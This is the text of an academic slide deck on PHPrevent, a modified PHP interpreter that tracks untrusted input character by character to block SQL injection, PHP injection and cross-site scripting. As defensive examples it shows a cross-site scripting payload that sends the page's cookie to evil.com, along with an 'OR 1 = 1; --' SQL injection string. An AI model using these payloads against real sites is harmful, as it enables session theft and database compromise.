Automatically Hardening Web Applications Using Precise Tainting Anh Nguyen-Tuong Salvatore Guarnieri Doug Greene Jeff Shirley David Evans University of Virginia phpBB Worm • • • • • December 21, 2004 Over 40,000 sites defaced PHP injection Loads Perl scripts to spread itself Uses Google to search for other phpBB sites 2 phpBB Vulnerability $words = explode (' ', trim (htmlspecialchars (urldecode ($HTTP_GET_VARS ['highlight'])))); ... $highlight_match[] = ... $words[$i] ...; ... … preg_replace (... $highlight_match ...) Original user input: '_%2527_attack User input after HTTP_GET_VARS call: \'_%27_attack User input after explicit urldecode call: \'_'_attack 3 Classes of Attacks • Code injection – Cause user provided data to be executed while data is being processed • PHP injection (phpBB worm) • SQL injection • Output generation – Cause user provided data to be displayed to visitors of the website: Cross Site Scripting 4 SQL Injection • Attacker constructs data that injects database commands • Example: $res = executeQuery ("SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' "); 5 Cross Site Scripting • Inserts user provided data onto a webpage that may include JavaScript • Executes with permissions of hosting website • Simple example: <b onmouseover= 'location.href= "http://evil.com/steal.php?" + document.cookie'>Hello</b> 6 7 Importance • Over 12% of Secunia Advisories • 4 of last 10 advisories from FrSIRT • Cross Site Scripting and Code Injection are responsible for many attacks on the internet • It is very hard to write bug free code 8 Previous Approaches • Static techniques • Dynamic techniques before deployment • Dynamic techniques during deployment 9 Static • • • • Static analyzers [Shanker+ 01] Code inspections [Fagan76] SQL prepared statements [Fisk04, Php05] Pros – No runtime overhead – Can be done before website is released to the public • Cons – Coding practices may need to change – Inspections are only as good as the inspector – Many false positives 10 Dynamic Before Deployment • Automated Test Suites: [Huang+ 04], [Tenable05], [Kavado05], [Offutt+ 04], [Watchfire05], [SPI05] • Human testing • Pros – Coding practices do not need to change – Attempts to simulate real world attacking conditions • Cons – Only tests known attacks, cannot show absence of vulnerability – Requires developer effort to fix security holes 11 Automated Dynamic: Firewalls • Incoming [Scott, Sharp 02] • Incoming and Outgoing [Watchfire04], [Kavado05], [Teros04] • Pros – No need to modify web service • Cons – Only prevent recognized attacks – Coarse policies without knowing application semantics 12 Automated: Magic Quotes • Escape all quotes supplied by a user • Implemented in PHP and other scripting languages • Extremely successful – Do not require the programmer to do anything – Prevent many SQL injection attacks – But, prevent only a specific class of attacks 13 Previous Work Limitations • Being precise about what constitutes an attack is a lot of work • Automated techniques suffer from not exploiting the application semantics • We want a system that works as effortlessly as magic quotes, but prevents a wider class of attacks 14 Our Approach • Fully automated • Aware of application semantics • Replace PHP interpreter with a modified interpreter that: – Keeps track of which information comes from untrusted sources (precise tainting) – Checks how untrusted input is used 15 file.php 2 3 File System Client 1 4 PHP Interpreter PHPrevent 8 5 HTTP Server Database 6 7 Web Server System APIs 16 Coarse Grain Tainting • Provided by many scripting languages (Perl, Ruby) • Untrusted input is tainted • Everything touched by tainted data becomes tainted $query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' "; Entire $query string is tainted 17 Precise Tainting • Untrusted input is tainted • Taint markings are maintained at character level – Depends on semantics of program • Only really tainted data is tainted $query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' "; $query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';'AND pwd = '' "; 18 Precise Checking • Wrappers around PHP functions that handle updating and checking precise taint information • Conservative: no false negatives while minimizing false positives – Behavior only changes when an attack is likely 19 Preventing SQL Injection • Parse the query using the Postgres SQL parser: identify interpreted text • Disallow SQL keywords or delimiters in interpreted text that is tainted – Query is not sent to database – Error response it returned "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' "; 20 Preventing PHP Injection • Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state – We place wrappers around these functions to enforce this rule • phpBB attack prevented by wrappers around preg_replace 21 Preventing Cross Site Scripting • Wrappers around output functions – Buffer output and then parse the tainted output with HTML Tidy • Check the parsed HTML against a white list to ensure there is no dangerous output – Dangerous content was determined by examining HTML grammar – Sanitize it by removing tags <b>Hello</b> Safe <b onmouseover= 'location.href= "http://evil.com/steal.php?" + document.cookie'>Hello</b> Unsafe 22 Current Status • Modified PHP interpreter: PHPrevent – Prevents PHP injection, SQL injection and cross site scripting attacks – Overly conservative: we have not specified precise semantics for most PHP functions • Performance – Initial measurements indicate performance overhead is acceptable 23 Future Work: Theory and Analysis • End-to-end information flow security • Replace ad-hoc taint marking with principled mechanism – Analyze data flow at interpreter level – Infer taint specifications for PHP functions using dynamic analysis • Verify that taint marking in PHP specification is consistent with interpreter implementation 24 Future Work: Implementation • Full implementation of precise tainting for PHP APIs • Handle persistent state – Track tainting through database store • Multiple tainting types with different checking rules • Incorporate modifications into main PHP distribution 25 Summary • Many websites are prone to attacks even after using current methods • Our method: – Fully automated – Prevents large classes of attacks – Easy to deploy 26 Thank You www.cs.virginia.edu/sammyg 27